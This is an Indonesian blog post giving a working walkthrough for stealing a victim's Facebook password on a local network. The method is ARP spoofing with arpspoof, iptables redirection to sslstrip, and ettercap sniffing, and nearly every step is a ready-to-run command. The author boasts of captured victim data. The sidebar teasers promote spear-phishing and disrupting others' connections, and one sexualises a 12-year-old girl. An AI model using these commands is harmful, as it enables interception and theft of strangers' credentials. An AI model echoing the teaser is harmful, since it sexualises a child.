SSL Strip Hijack Facebook Password
SSL Strip Hijack Facebook Password
Oke, dalam kesempatan ini saya sedang malas membuat kalimat pembuka, jadi kita langsung saja ke pesta.
Pertama, cek konfigurasi Ettercap dengan memasukan command ini di terminal:
Code:
root@metasploit:~# gedit /etc/etter.confKemudian cek baris ke 167:
File:
# if you use iptables: #redir_command_on = "iptables -t nat -A PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport" #redir_command_off = "iptables -t nat -D PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"Hapus karakter pagar di depan line ke 168: "#redir command on ....", sehingga menjadi:
File:
# if you use iptables: redir_command_on = "iptables -t nat -A PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport" redir_command_off = "iptables -t nat -D PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"Save, lalu kita akan menuju tahap kedua. Masukan perintah ini dengan menggunakan terminal:
Code:
root@metasploit:~# echo 1 > /proc/sys/net/ipv4/ip_forwardKemudian:
Code:
root@metasploit:~# arpspoof -i wlan0 -t [ipaddress korban] [default gateway korban]Jika berhasil, maka terminal akan tampak seperti ini:
Kemudian kita akan melakukan proses routing, dimana korban akan dialihkan ke suatu ip address atai port yang telah ditentukan oleh penyerang. Masukan kode berikut. [Catatan: Jangan hentikan proses arpspoof, buat tab baru, atau buka terminal baru untuk melakukan proses routing]
Code:
root@metasploit:~# iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports 10000Kemudian:
Code:
root@metasploit:~# ettercap -T -q -i wlan0
Pada tahap ini korban tidak akan bisa menuju web manapun yang menggunakan koneksi SSL atau HTTPS karena sudah dirouting ke port 10000. Disaat krusial ini, kita membutuhkan bantuan SSLstrip untuk mengijinkan korban mengakses HTTPS dengan syarat kebobolan password. Masukan kode berikut:
Code:
root@metasploit:~# sslstrip -a -k -fKemudian kita sniffing kembali koneksi yang terjadi pada ip address korban dengan bantuan ettercap. Anda tidak akan percaya dengan apa yang sudah saya lakukan. Berikut screenshoot korban yang saya dapatkan.
Langganan:
Posting Komentar (Atom)
Popular Posts
-
1.LOAD_FILE Load file adalah query SQL untuk meng-load suatu file scara remote..kurang lebihnya seperti itu ..
-
assalamualaikummm permisi bang ane cuma mau share,.... gimana cara atau trik membuat Flashing screen ( atau layar menjadi kelap kelip,....) -
pada kamus ini terdapat pilihan opsi dari bahasa Perancis ke Indonesia, dari bahasa Indonesia ke Perancis, lihat seluruh kata, tes, help se... -
siap meluncur di tunggu dari kawan kawan untuk sharing bugs and scaning pake bot
-
Oke, untuk yang belum tau aja yhaa... ^^ Utk pengguna windoss, install dlu interpreter python, coz bhs ini ga default ada… (ckckck...
-
Membuat payload dan mengirimnya kepada target dengan metode spear pishing attack adalah cara termudah dalam melakukan exploitasi. Nam... -
Buat Ngerjaain Koneksi Orang Gunakan Seperlunya... Misalnya buat mutusin koneksi orang yang lagi buka situs porno
-
ada model baru dari vietnam. baru 12 taun gan. liat kaki nya deh gan, bikin deg deg an Cewek Idaman : Lê Hoàng Bảo Trân (Le Hoang Bao ... -
10. Humpback Whale (Paus Bungkuk) Ketika salah satu mamalia laut terbesar hendak mencari makan yang benar-benar besar, hanya satu atau dua... -
Ciuman adalah bahasa tubuh yang populer untuk mengungkapkan rasa sayang kepada pasangan, teman maupun keluarga. Tapi ada beberapa tipe...
Tidak ada komentar:
Posting Komentar